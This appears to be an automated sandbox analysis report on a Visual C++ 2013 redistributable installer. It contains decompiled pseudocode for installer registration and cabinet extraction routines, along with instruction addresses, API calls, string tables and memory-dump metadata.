																							_t148 =  *_t67;
																							__eflags = _t148;
																							if(_t148 == 0) {
																								L33:
																								_t69 = _t198 + 0x7c; // 0x5347012b
																								_t149 =  *_t69;
																								__eflags = _t149;
																								if(_t149 == 0) {
																									L36:
																									_t73 = _t198 + 0x80; // 0xc7ec7d89
																									_t150 =  *_t73;
																									__eflags = _t150;
																									if(_t150 == 0) {
																										L38:
																										_t75 = _t198 + 0x84; // 0x2f845
																										_t151 =  *_t75;
																										__eflags = _t151;
																										if(_t151 == 0) {
																											L40:
																											_t77 = _t198 + 0x88; // 0x15ff0000
																											_t152 =  *_t77;
																											__eflags = _t152 - 1;
																											if(_t152 != 1) {
																												__eflags = _t152 - 2;
																												if(_t152 == 2) {
																													goto L43;
																												} else {
																													_t91 = _t198 + 0x54; // 0x4005be
																													_t197 = L"ModifyPath";
																													_t161 = E012B3BA8(_t183, _t192, _v8, L"ModifyPath", L"\"%ls\" /modify",  *_t91); // executed
																													_t180 = _t161;
																													_t200 = _t200 + 0x10;
																													__eflags = _t180;
																													if(_t180 < 0) {
																														goto L69;
																													} else {
																														_t197 = L"NoElevateOnModify";
																														goto L42;
																													}
																												}
																											} else {
																												_t197 = L"NoModify";
																												L42:
																												_t162 = E012B362A(_v8, _t197, 1); // executed
																												_t180 = _t162;
																												__eflags = _t180;
																												if(_t180 < 0) {
																													goto L69;
																												} else {
																													L43:
																													__eflags =  *(_t198 + 0x8c);
																													if( *(_t198 + 0x8c) == 0) {
																														L45:
																														__eflags =  *(_t198 + 4);
																														if( *(_t198 + 4) != 0) {
																															L47:
																															_t84 = _t198 + 0x54; // 0x4005be
																															_t197 = L"QuietUninstallString";
																															_t153 = E012B3BA8(_t183, _t192, _v8, L"QuietUninstallString", L"\"%ls\" /uninstall /quiet",  *_t84); // executed
																															_t180 = _t153;
																															_t200 = _t200 + 0x10;
																															__eflags = _t180;
																															if(_t180 < 0) {
																																goto L69;
																															} else {
																																__eflags =  *((intOrPtr*)(_t198 + 0x88)) - 2;
																																_t154 = L"/modify";
																																if( *((intOrPtr*)(_t198 + 0x88)) != 2) {
																																	_t154 = L" /uninstall";
																																}
																																_push(_t154);
																																_t87 = _t198 + 0x54; // 0x4005be
																																_t197 = L"UninstallString";
																																_t155 = E012B3BA8(_t183, _t192, _v8, L"UninstallString", L"\"%ls\" %ls",  *_t87); // executed
																																_t180 = _t155;
																																_t200 = _t200 + 0x14;
																																__eflags = _t180;
																																if(_t180 < 0) {
																																	goto L69;
																																} else {
																																	__eflags =  *(_t198 + 0x98);
																																	if( *(_t198 + 0x98) == 0) {
																																		L57:
																																		__eflags =  *(_t198 + 0x9c);
																																		if( *(_t198 + 0x9c) == 0) {
																																			goto L60;
																																		} else {
																																			_t180 = E01286AA5(_t198, _t180, _t183, _t192, _a12);
																																			__eflags = _t180;
																																			if(_t180 >= 0) {
																																				goto L60;
																																			} else {
																																				_push("Failed to write update registration.");
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t90 = _t198 + 0x94; // 0x128144f
																																		_t180 = E01285EBF(_t90, _t183, _t192,  *_t198);
																																		__eflags = _t180;
																																		if(_t180 >= 0) {
																																			goto L57;
																																		} else {
																																			_push("Failed to write software tags.");
																																			L75:
																																			_push(_t180);
																																			E012AFA86();
																																		}
																																	}
																																}
																															}
																														} else {
																															_t197 = L"SystemComponent";
																															_t180 = E012B362A(_v8, L"SystemComponent", 1);
																															__eflags = _t180;
																															if(_t180 < 0) {
																																goto L69;
																															} else {
																																goto L47;
																															}
																														}
																													} else {
																														_t80 = _t198 + 0x90; // 0x3975c085
																														_t197 = L"NoRemove";
																														_t180 = E012B362A(_v8, L"NoRemove",  *_t80);
																														__eflags = _t180;
																														if(_t180 < 0) {
																															goto L69;
																														} else {
																															goto L45;
																														}
																													}
																												}
																											}
																										} else {
																											_t197 = L"Contact";
																											_t180 = E012B3B02(_t183, _t192, _v8, L"Contact", _t151);
																											__eflags = _t180;
																											if(_t180 < 0) {
																												goto L69;
																											} else {
																												goto L40;
																											}
																										}
																									} else {
																										_t197 = L"Comments";
																										_t180 = E012B3B02(_t183, _t192, _v8, L"Comments", _t150);
																										__eflags = _t180;
																										if(_t180 < 0) {
																											goto L69;
																										} else {
																											goto L38;
																										}
																									}
																								} else {
																									_t197 = L"ParentDisplayName";
																									_t180 = E012B3B02(_t183, _t192, _v8, L"ParentDisplayName", _t149);
																									__eflags = _t180;
																									if(_t180 < 0) {
																										goto L69;
																									} else {
																										_t71 = _t198 + 0x7c; // 0x5347012b
																										_t197 = L"ParentKeyName";
																										_t180 = E012B3B02(_t183, _t192, _v8, L"ParentKeyName",  *_t71);
																										__eflags = _t180;
																										if(_t180 < 0) {
																											goto L69;
																										} else {
																											goto L36;
																										}
																									}
																								}
																							} else {
																								_t197 = L"URLUpdateInfo";
																								_t180 = E012B3B02(_t183, _t192, _v8, L"URLUpdateInfo", _t148);
																								__eflags = _t180;
																								if(_t180 < 0) {
																									goto L69;
																								} else {
																									goto L33;
																								}
																							}
																						} else {
																							_t197 = L"URLInfoAbout";
																							_t180 = E012B3B02(_t183, _t192, _v8, L"URLInfoAbout", _t147);
																							__eflags = _t180;
																							if(_t180 < 0) {
																								goto L69;
																							} else {
																								goto L31;
																							}
																						}
																					} else {
																						_t197 = L"HelpTelephone";
																						_t180 = E012B3B02(_t183, _t192, _v8, L"HelpTelephone", _t146);
																						__eflags = _t180;
																						if(_t180 < 0) {
																							goto L69;
																						} else {
																							goto L29;
																						}
																					}
																				} else {
																					_t197 = L"HelpLink";
																					_t180 = E012B3B02(_t183, _t192, _v8, L"HelpLink", _t145);
																					__eflags = _t180;
																					if(_t180 < 0) {
																						goto L69;
																					} else {
																						goto L27;
																					}
																				}
																			} else {
																				_t197 = L"Publisher";
																				_t171 = E012B3B02(_t183, _t192, _v8, L"Publisher", _t144); // executed
																				_t180 = _t171;
																				__eflags = _t180;
																				if(_t180 < 0) {
																					goto L69;
																				} else {
																					goto L25;
																				}
																			}
																		} else {
																			_t197 = L"DisplayVersion";
																			_t172 = E012B3B02(_t183, _t192, _v8, L"DisplayVersion", _t143); // executed
																			_t180 = _t172;
																			__eflags = _t180;
																			if(_t180 < 0) {
																				goto L69;
																			} else {
																				goto L23;
																			}
																		}
																	}
																}
															}
														} else {
															_t197 = L"BundleTag";
															_t173 = E012B3B02(_t183, _t192, _v8, L"BundleTag", _t136); // executed
															_t180 = _t173;
															__eflags = _t180;
															if(_t180 < 0) {
																goto L69;
															} else {
																goto L16;
															}
														}
													} else {
														_t197 = L"BundleProviderKey";
														_t174 = E012B3B02(_t183, _t192, _v8, L"BundleProviderKey", _t135); // executed
														_t180 = _t174;
														__eflags = _t180;
														if(_t180 < 0) {
															goto L69;
														} else {
															goto L14;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_push("Failed to create registration key.");
						_push(_t180);
						E012AFA86();
					}
				} else {
					_t14 = _t198 + 0x10; // 0xc0335756
					_t15 = _t198 + 0x48; // 0xd00
					_t178 = E012997E3(__ecx, __edx,  *_t198,  *_t15,  *_t14, _a16 + 4, _a4); // executed
					_t180 = _t178;
					if(_t180 >= 0) {
						goto L3;
					} else {
						E012AFA86(_t180, "Failed to cache bundle from path: %ls", _a4);
					}
				}
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t180;
			}

0x01286c31
0x01286c31
0x01286c31
0x01286c37
0x01286c3b
0x01286c41
0x01286c44
0x01286c4c
0x01286c4d
0x01286c50
0x01286c5a
0x01286c5f
0x01286c66
0x01286c9b
0x01286ca4
0x01286ca7
0x01286caa
0x01286caf
0x01286cb1
0x01286cb3
0x01286cc7
0x01286ccb
0x01286ccc
0x012870e6
0x012870e6
0x012870ea
0x01287137
0x01287137
0x0128713b
0x01287150
0x01287158
0x0128715d
0x0128715f
0x01287161
0x01287163
0x00000000
0x01287163
0x0128713d
0x0128713e
0x01287143
0x01287145
0x01287147
0x00000000
0x01287149
0x01287149
0x00000000
0x01287149
0x01287147
0x012870ec
0x012870ec
0x012870f2
0x012870f6
0x012870f9
0x012870fb
0x00000000
0x012870fd
0x012870fd
0x0128710e
0x0128710e
0x00000000
0x012870ff
0x012870ff
0x01287101
0x00000000
0x01287103
0x01287103
0x01287105
0x01287107
0x00000000
0x01287109
0x01287109
0x0128710c
0x00000000
0x00000000
0x0128710c
0x01287107
0x01287111
0x01287112
0x0128711b
0x01287120
0x01287122
0x01287124
0x00000000
0x00000000
0x00000000
0x00000000
0x01287124
0x01287101
0x012870fd
0x012870fb
0x01286cd2
0x01286cd2
0x01286cd5
0x01286cde
0x01286ce3
0x01286ce5
0x01286ce7
0x01287126
0x0128712d
0x01286ced
0x01286ced
0x01286cf0
0x01286cf5
0x01286cfc
0x01286d01
0x01286d03
0x01286d05
0x00000000
0x01286d0b
0x01286d0b
0x01286d0e
0x01286d13
0x01286d1a
0x01286d1f
0x01286d21
0x01286d23
0x00000000
0x01286d29
0x01286d29
0x01286d2c
0x01286d31
0x01286d38
0x01286d3d
0x01286d3f
0x01286d41
0x00000000
0x01286d47
0x01286d47
0x01286d4a
0x01286d4f
0x01286d56
0x01286d5b
0x01286d5d
0x01286d5f
0x00000000
0x01286d65
0x01286d65
0x01286d65
0x01286d68
0x01286d68
0x01286d6e
0x01286d6f
0x01286d78
0x01286d79
0x01286d7c
0x01286d7d
0x01286d89
0x01286d92
0x01286d95
0x01286d9a
0x01286d9c
0x01286d9f
0x01286da1
0x00000000
0x01286da7
0x01286da7
0x01286da7
0x01286daa
0x01286dac
0x01286dc7
0x01286dc7
0x01286dc7
0x01286dca
0x01286dcc
0x01286de7
0x01286df1
0x01286dfa
0x01286dff
0x01286e01
0x01286e04
0x01286e06
0x00000000
0x01286e0c
0x01286e0c
0x01286e0f
0x01286e1d
0x01286e22
0x01286e24
0x01286e27
0x01286e29
0x00000000
0x01286e2f
0x01286e38
0x01286e3d
0x01286e3f
0x01286e42
0x01286e44
0x01286e44
0x01286e44
0x01286e48
0x01286e51
0x01286e56
0x01286e58
0x01286e5a
0x00000000
0x01286e60
0x01286e60
0x01286e60
0x01286e63
0x01286e65
0x01286e80
0x01286e80
0x01286e80
0x01286e83
0x01286e85
0x01286ea0
0x01286ea0
0x01286ea0
0x01286ea3
0x01286ea5
0x01286ec0
0x01286ec0
0x01286ec0
0x01286ec3
0x01286ec5
0x01286ee0
0x01286ee0
0x01286ee0
0x01286ee3
0x01286ee5
0x01286f00
0x01286f00
0x01286f00
0x01286f03
0x01286f05
0x01286f20
0x01286f20
0x01286f20
0x01286f23
0x01286f25
0x01286f5b
0x01286f5b
0x01286f5b
0x01286f61
0x01286f63
0x01286f7e
0x01286f7e
0x01286f7e
0x01286f84
0x01286f86
0x01286fa1
0x01286fa1
0x01286fa1
0x01286fa7
0x01286faa
0x01287091
0x01287094
0x00000000
0x0128709a
0x0128709a
0x0128709d
0x012870ab
0x012870b0
0x012870b2
0x012870b5
0x012870b7
0x00000000
0x012870b9
0x012870b9
0x00000000
0x012870b9
0x012870b7
0x01286fb0
0x01286fb0
0x01286fb5
0x01286fbb
0x01286fc0
0x01286fc2
0x01286fc4
0x00000000
0x01286fca
0x01286fca
0x01286fca
0x01286fd1
0x01286ff1
0x01286ff1
0x01286ff5
0x01287011
0x01287011
0x01287014
0x01287022
0x01287027
0x01287029
0x0128702c
0x0128702e
0x00000000
0x01287034
0x01287034
0x0128703b
0x01287040
0x01287042
0x01287042
0x01287047
0x01287048
0x0128704b
0x01287059
0x0128705e
0x01287060
0x01287063
0x01287065
0x00000000
0x0128706b
0x0128706b
0x01287072
0x012870c3
0x012870c3
0x012870ca
0x00000000
0x012870cc
0x012870d6
0x012870d8
0x012870da
0x00000000
0x012870dc
0x012870dc
0x00000000
0x012870dc
0x012870da
0x01287074
0x01287076
0x01287081
0x01287083
0x01287085
0x00000000
0x01287087
0x01287087
0x01287168
0x01287168
0x01287169
0x0128716f
0x01287085
0x01287072
0x01287065
0x01286ff7
0x01286ff9
0x01287007
0x01287009
0x0128700b
0x00000000
0x00000000
0x00000000
0x00000000
0x0128700b
0x01286fd3
0x01286fd3
0x01286fd9
0x01286fe7
0x01286fe9
0x01286feb
0x00000000
0x00000000
0x00000000
0x00000000
0x01286feb
0x01286fd1
0x01286fc4
0x01286f88
0x01286f89
0x01286f97
0x01286f99
0x01286f9b
0x00000000
0x00000000
0x00000000
0x00000000
0x01286f9b
0x01286f65
0x01286f66
0x01286f74
0x01286f76
0x01286f78
0x00000000
0x00000000
0x00000000
0x00000000
0x01286f78
0x01286f27
0x01286f28
0x01286f36
0x01286f38
0x01286f3a
0x00000000
0x01286f40
0x01286f40
0x01286f43
0x01286f51
0x01286f53
0x01286f55
0x00000000
0x00000000
0x00000000
0x00000000
0x01286f55
0x01286f3a
0x01286f07
0x01286f08
0x01286f16
0x01286f18
0x01286f1a
0x00000000
0x00000000
0x00000000
0x00000000
0x01286f1a
0x01286ee7
0x01286ee8
0x01286ef6
0x01286ef8
0x01286efa
0x00000000
0x00000000
0x00000000
0x00000000
0x01286efa
0x01286ec7
0x01286ec8
0x01286ed6
0x01286ed8
0x01286eda
0x00000000
0x00000000
0x00000000
0x00000000
0x01286eda
0x01286ea7
0x01286ea8
0x01286eb6
0x01286eb8
0x01286eba
0x00000000
0x00000000
0x00000000
0x00000000
0x01286eba
0x01286e87
0x01286e88
0x01286e91
0x01286e96
0x01286e98
0x01286e9a
0x00000000
0x00000000
0x00000000
0x00000000
0x01286e9a
0x01286e67
0x01286e68
0x01286e71
0x01286e76
0x01286e78
0x01286e7a
0x00000000
0x00000000
0x00000000
0x00000000
0x01286e7a
0x01286e65
0x01286e5a
0x01286e29
0x01286dce
0x01286dcf
0x01286dd8
0x01286ddd
0x01286ddf
0x01286de1
0x00000000
0x00000000
0x00000000
0x00000000
0x01286de1
0x01286dae
0x01286daf
0x01286db8
0x01286dbd
0x01286dbf
0x01286dc1
0x00000000
0x00000000
0x00000000
0x00000000
0x01286dc1
0x01286dac
0x01286da1
0x01286d5f
0x01286d41
0x01286d23
0x01286d05
0x01286ce7
0x01286cb5
0x01286cb5
0x01286cba
0x01286cbb
0x01286cc1
0x01286c68
0x01286c72
0x01286c75
0x01286c7a
0x01286c7f
0x01286c83
0x00000000
0x01286c85
0x01286c8e
0x01286c93
0x01286c83
0x01287175
0x0128717a
0x0128717a
0x01287183
0x01287188
0x01287188
0x01287193

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000000,F08B8007,057CF33B,00020006,00000000), ref: 01287188

Strings

Publisher, xrefs: 01286E88, 01286E8D
ParentDisplayName, xrefs: 01286F28, 01286F2D
HelpLink, xrefs: 01286EA8, 01286EAD
Contact, xrefs: 01286F89, 01286F8E
Failed to write %ls value., xrefs: 01287127
SystemComponent, xrefs: 01286FF9, 01286FFE
ParentKeyName, xrefs: 01286F43, 01286F48
Failed to create registration key., xrefs: 01286CB5
3.7.2829.0, xrefs: 01286DE7
HelpTelephone, xrefs: 01286EC8, 01286ECD
EngineVersion, xrefs: 01286DF1, 01286DF6
BundleTag, xrefs: 01286DCF, 01286DD4
"%ls" %ls, xrefs: 01287050
BundleVersion, xrefs: 01286D89, 01286D8E
BundlePatchCode, xrefs: 01286D4A, 01286D52
QuietUninstallString, xrefs: 01287014, 0128701E
BundleProviderKey, xrefs: 01286DAF, 01286DB4
DisplayVersion, xrefs: 01286E68, 01286E6D
Failed to update resume mode., xrefs: 01287163
BundleUpgradeCode, xrefs: 01286CF0, 01286CF8
BundleDetectCode, xrefs: 01286D2C, 01286D34
%hu.%hu.%hu.%hu, xrefs: 01286D84
%hs, xrefs: 01286DEC
Failed to cache bundle from path: %ls, xrefs: 01286C88
Failed to register the bundle dependency key., xrefs: 01287149
ModifyPath, xrefs: 0128709D, 012870A7
URLInfoAbout, xrefs: 01286EE8, 01286EED
DisplayName, xrefs: 01286E48, 01286E4D
"%ls" /uninstall /quiet, xrefs: 01287019
EstimatedSize, xrefs: 01287112, 01287117, 01287126
DisplayIcon, xrefs: 01286E0F, 01286E19
NoRemove, xrefs: 01286FD9, 01286FDE
NoModify, xrefs: 01286FB0, 01286FB7
/modify, xrefs: 0128703B
BundleAddonCode, xrefs: 01286D0E, 01286D16
Failed to write update registration., xrefs: 012870DC
Comments, xrefs: 01286F66, 01286F6B
BundleCachePath, xrefs: 01286CD5, 01286CDA
NoElevateOnModify, xrefs: 012870B9
URLUpdateInfo, xrefs: 01286F08, 01286F0D
%s,0, xrefs: 01286E14
Failed to write software tags., xrefs: 01287087
"%ls" /modify, xrefs: 012870A2
/uninstall, xrefs: 01287042, 01287047
engine.cpp, xrefs: 01286E47
UninstallString, xrefs: 0128704B, 01287055

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.7.2829.0$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$engine.cpp
API String ID: 3535843008-1617658161
Opcode ID: a5659974b0a1cee060c7f5a4da25a6f97c114a9fcfea678a15a5ecc5d918c9eb
Instruction ID: 04177925a9fb1404ca86ff8624ee1198207b51fb1662a5dea54e257fcf3023ac
Opcode Fuzzy Hash: a5659974b0a1cee060c7f5a4da25a6f97c114a9fcfea678a15a5ecc5d918c9eb
Instruction Fuzzy Hash: 51E1C530731703ABDB22AEA5CDC1F9B7EFAAF64344F240428E645A6691DBB1E914D710

Uniqueness

Uniqueness Score: -1.00%

Function 012A54EE Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 287
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E012A54EE(union _LARGE_INTEGER* __eax, void* __ecx, union _LARGE_INTEGER* __edx, void* __edi) {
				signed int _v8;
				void* _t31;
				intOrPtr _t38;
				union _LARGE_INTEGER _t44;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t56;
				void* _t59;
				intOrPtr _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				union _LARGE_INTEGER* _t76;
				void* _t80;
				union _LARGE_INTEGER* _t84;
				void* _t85;
				signed int _t87;

				_t85 = __edi;
				_t84 = __edx;
				_t79 = __ecx;
				_push(__ecx);
				_t76 = __eax;
				_v8 = 1;
				if(SetEvent( *(__edi + 0x28)) != 0) {
					if(WaitForSingleObject( *(__edi + 0x24), 0xffffffff) != 0xffffffff) {
						if(ResetEvent( *(__edi + 0x24)) != 0) {
							_t31 =  *((intOrPtr*)(__edi + 0x2c)) - 1;
							if(_t31 == 0) {
								_t87 = E012B08BB(_t79,  *((intOrPtr*)(__edi + 0x34)), _t76->LowPart.HighPart, 0, 0xfde9);
								if(_t87 >= 0) {
									if(SetEvent( *(__edi + 0x28)) != 0) {
										if(WaitForSingleObject( *(__edi + 0x24), 0xffffffff) != 0xffffffff) {
											if(ResetEvent( *(__edi + 0x24)) != 0) {
												_t38 =  *((intOrPtr*)(__edi + 0x2c));
												if(_t38 == 0) {
													_t80 = CreateFileW( *(__edi + 0x38), 0x40000000, 1, 0, 2, 0x80, 0);
													 *(__edi + 0x3c) = _t80;
													if(_t80 != 0xffffffff) {
														_push(0);
														asm("cdq");
														if(SetFilePointerEx(_t80, _t76->LowPart, _t84, 0) != 0) {
															if(SetEndOfFile( *(__edi + 0x3c)) != 0) {
																_push(0);
																_t44 = SetFilePointerEx( *(__edi + 0x3c), 0, 0, 0);
																if(_t44 != 0) {
																	L81:
																	 *(_t85 + 0x30) = _t87;
																	if(_t87 < 0) {
																		return _t44 | 0xffffffff;
																	} else {
																		return _v8;
																	}
																}
																_t47 = GetLastError();
																if(_t47 > 0) {
																	_t47 = _t47 & 0x0000ffff | 0x80070000;
																}
																_t87 = _t47;
																if(_t87 >= 0) {
																	_t87 = 0x80004005;
																}
																E012B294E(_t47, "cabextract.cpp", 0x22e, _t87);
																_push("Failed to set file pointer to beginning of file.");
																L80:
																_push(_t87);
																_t44 = E012AFA86();
																goto L81;
															}
															_t50 = GetLastError();
															if(_t50 > 0) {
																_t50 = _t50 & 0x0000ffff | 0x80070000;
															}
															_t87 = _t50;
															if(_t87 >= 0) {
																_t87 = 0x80004005;
															}
															E012B294E(_t50, "cabextract.cpp", 0x228, _t87);
															_push("Failed to set end of file.");
															goto L80;
														}
														_t53 = GetLastError();
														if(_t53 > 0) {
															_t53 = _t53 & 0x0000ffff | 0x80070000;
														}
														_t87 = _t53;
														if(_t87 >= 0) {
															_t87 = 0x80004005;
														}
														E012B294E(_t53, "cabextract.cpp", 0x223, _t87);
														_push("Failed to set file pointer to end of file.");
														goto L80;
													}
													_t56 = GetLastError();
													if(_t56 > 0) {
														_t56 = _t56 & 0x0000ffff | 0x80070000;
													}
													_t87 = _t56;
													if(_t87 >= 0) {
														_t87 = 0x80004005;
													}
													E012B294E(_t56, "cabextract.cpp", 0x21c, _t87);
													_push( *((intOrPtr*)(_t85 + 0x38)));
													_push("Failed to create file: %ls");
													L28:
													_push(_t87);
													_t44 = E012AFA86();
													goto L81;
												}
												_t59 = _t38 - 1;
												if(_t59 == 0) {
													_t60 = E012B233B(_t76->LowPart, 1); // executed
													 *((intOrPtr*)(__edi + 0x40)) = _t60;
													if(_t60 != 0) {
														_t44 =  *_t76;
														 *(__edi + 0x48) =  *(__edi + 0x48) & 0x00000000;
														 *(__edi + 0x44) = _t44;
														goto L81;
													}
													_t87 = 0x8007000e;
													E012B294E(_t60, "cabextract.cpp", 0x236, 0x8007000e);
													_push("Failed to allocate buffer for stream.");
													goto L80;
												}
												_t44 = _t59 - 1;
												if(_t44 == 0) {
													_v8 = _v8 & 0x00000000;
													goto L81;
												}
												_t44 = _t44 - 1;
												if(_t44 == 0) {
													L25:
													_t87 = 0x80004004;
													goto L81;
												}
												_t87 = 0x8007139f;
												_push(0x8007139f);
												_push(0x247);
												L24:
												_push("cabextract.cpp");
												E012B294E(_t44);
												_push("Invalid operation for this state.");
												goto L80;
											}
											_t63 = GetLastError();
											if(_t63 > 0) {
												_t63 = _t63 & 0x0000ffff | 0x80070000;
											}
											_t87 = _t63;
											if(_t87 >= 0) {
												_t87 = 0x80004005;
											}
											_push(_t87);
											_push(0x211);
											L20:
											_push("cabextract.cpp");
											E012B294E(_t63);
											_push("Failed to reset begin operation event.");
											goto L80;
										}
										_t66 = GetLastError();
										if(_t66 > 0) {
											_t66 = _t66 & 0x0000ffff | 0x80070000;
										}
										_t87 = _t66;
										if(_t87 >= 0) {
											_t87 = 0x80004005;
										}
										_push(_t87);
										_push(0x20c);
										L13:
										_push("cabextract.cpp");
										E012B294E(_t66);
										_push("Failed to wait for begin operation event.");
										goto L80;
									}
									_t69 = GetLastError();
									if(_t69 > 0) {
										_t69 = _t69 & 0x0000ffff | 0x80070000;
									}
									_t87 = _t69;
									if(_t87 >= 0) {
										_t87 = 0x80004005;
									}
									_push(_t87);
									_push(0x206);
									L6:
									_push("cabextract.cpp");
									E012B294E(_t69);
									_push("Failed to set operation complete event.");
									goto L80;
								}
								_push(_t76->LowPart.HighPart);
								_push("Failed to copy stream name: %ls");
								goto L28;
							}
							_t44 = _t31 - 4;
							if(_t44 == 0) {
								goto L25;
							}
							_t87 = 0x8007139f;
							_push(0x8007139f);
							_push(0x1fc);
							goto L24;
						}
						_t63 = GetLastError();
						if(_t63 > 0) {
							_t63 = _t63 & 0x0000ffff | 0x80070000;
						}
						_t87 = _t63;
						if(_t87 >= 0) {
							_t87 = 0x80004005;
						}
						_push(_t87);
						_push(0x1ee);
						goto L20;
					}
					_t66 = GetLastError();
					if(_t66 > 0) {
						_t66 = _t66 & 0x0000ffff | 0x80070000;
					}
					_t87 = _t66;
					if(_t87 >= 0) {
						_t87 = 0x80004005;
					}
					_push(_t87);
					_push(0x1e9);
					goto L13;
				}
				_t69 = GetLastError();
				if(_t69 > 0) {
					_t69 = _t69 & 0x0000ffff | 0x80070000;
				}
				_t87 = _t69;
				if(_t87 >= 0) {
					_t87 = 0x80004005;
				}
				_push(_t87);
				_push(0x1e3);
				goto L6;
			}

0x012a54ee
0x012a54ee
0x012a54ee
0x012a54f1
0x012a54f7
0x012a54f9
0x012a5508
0x012a5551
0x012a5597
0x012a55d5
0x012a55d6
0x012a5618
0x012a561c
0x012a563f
0x012a5679
0x012a56b0
0x012a56e0
0x012a56e1
0x012a5761
0x012a5763
0x012a5769
0x012a57af
0x012a57b1
0x012a57bb
0x012a5801
0x012a583b
0x012a5844
0x012a5848
0x012a5886
0x012a5886
0x012a588d
0x012a5898
0x012a588f
0x012a5893
0x012a5893
0x012a588d
0x012a584a
0x012a5852
0x012a5859
0x012a5859
0x012a585e
0x012a5862
0x012a5864
0x012a5864
0x012a5874
0x012a5879
0x012a587e
0x012a587e
0x012a587f
0x00000000
0x012a5885
0x012a5803
0x012a580b
0x012a5812
0x012a5812
0x012a5817
0x012a581b
0x012a581d
0x012a581d
0x012a582d
0x012a5832
0x00000000
0x012a5832
0x012a57bd
0x012a57c5
0x012a57cc
0x012a57cc
0x012a57d1
0x012a57d5
0x012a57d7
0x012a57d7
0x012a57e7
0x012a57ec
0x00000000
0x012a57ec
0x012a576b
0x012a5773
0x012a577a
0x012a577a
0x012a577f
0x012a5783
0x012a5785
0x012a5785
0x012a5795
0x012a579a
0x012a579d
0x012a5626
0x012a5626
0x012a5627
0x00000000
0x012a562c
0x012a56e3
0x012a56e4
0x012a570d
0x012a5712
0x012a5717
0x012a5738
0x012a573a
0x012a573e
0x00000000
0x012a573e
0x012a5719
0x012a5729
0x012a572e
0x00000000
0x012a572e
0x012a56e6
0x012a56e7
0x012a5700
0x00000000
0x012a5700
0x012a56e9
0x012a56ea
0x012a55fc
0x012a55fc
0x00000000
0x012a55fc
0x012a56f0
0x012a56f5
0x012a56f6
0x012a55e8
0x012a55e8
0x012a55ed
0x012a55f2
0x00000000
0x012a55f2
0x012a56b2
0x012a56ba
0x012a56c1
0x012a56c1
0x012a56c6
0x012a56ca
0x012a56cc
0x012a56cc
0x012a56d1
0x012a56d2
0x012a55be
0x012a55be
0x012a55c3
0x012a55c8
0x00000000
0x012a55c8
0x012a567b
0x012a5683
0x012a568a
0x012a568a
0x012a568f
0x012a5693
0x012a5695
0x012a5695
0x012a569a
0x012a569b
0x012a5578
0x012a5578
0x012a557d
0x012a5582
0x00000000
0x012a5582
0x012a5641
0x012a5649
0x012a5650
0x012a5650
0x012a5655
0x012a5659
0x012a565b
0x012a565b
0x012a5660
0x012a5661
0x012a552f
0x012a552f
0x012a5534
0x012a5539
0x00000000
0x012a5539
0x012a561e
0x012a5621
0x00000000
0x012a5621
0x012a55d8
0x012a55db
0x00000000
0x00000000
0x012a55dd
0x012a55e2
0x012a55e3
0x00000000
0x012a55e3
0x012a5599
0x012a55a1
0x012a55a8
0x012a55a8
0x012a55ad
0x012a55b1
0x012a55b3
0x012a55b3
0x012a55b8
0x012a55b9
0x00000000
0x012a55b9
0x012a5553
0x012a555b
0x012a5562
0x012a5562
0x012a5567
0x012a556b
0x012a556d
0x012a556d
0x012a5572
0x012a5573
0x00000000
0x012a5573
0x012a550a
0x012a5512
0x012a5519
0x012a5519
0x012a551e
0x012a5522
0x012a5524
0x012a5524
0x012a5529
0x012a552a
0x00000000

APIs

SetEvent.KERNEL32(?,?,?,?,?,012A5D18), ref: 012A5500
GetLastError.KERNEL32(?,?,?,012A5D18), ref: 012A550A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,012A5D18), ref: 012A5548
GetLastError.KERNEL32(?,?,?,012A5D18), ref: 012A5553
ResetEvent.KERNEL32(?,?,?,?,012A5D18), ref: 012A558F
GetLastError.KERNEL32(?,?,?,012A5D18), ref: 012A5599

Strings

Invalid operation for this state., xrefs: 012A55F2
Failed to wait for begin operation event., xrefs: 012A5582
Failed to allocate buffer for stream., xrefs: 012A572E
Failed to set operation complete event., xrefs: 012A5539
Failed to copy stream name: %ls, xrefs: 012A5621
cabextract.cpp, xrefs: 012A552F, 012A5578, 012A55BE, 012A55E8, 012A5724, 012A5790, 012A57E2, 012A5828, 012A586F
Failed to set end of file., xrefs: 012A5832
Failed to set file pointer to beginning of file., xrefs: 012A5879
Failed to reset begin operation event., xrefs: 012A55C8
Failed to set file pointer to end of file., xrefs: 012A57EC
Failed to create file: %ls, xrefs: 012A579D

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

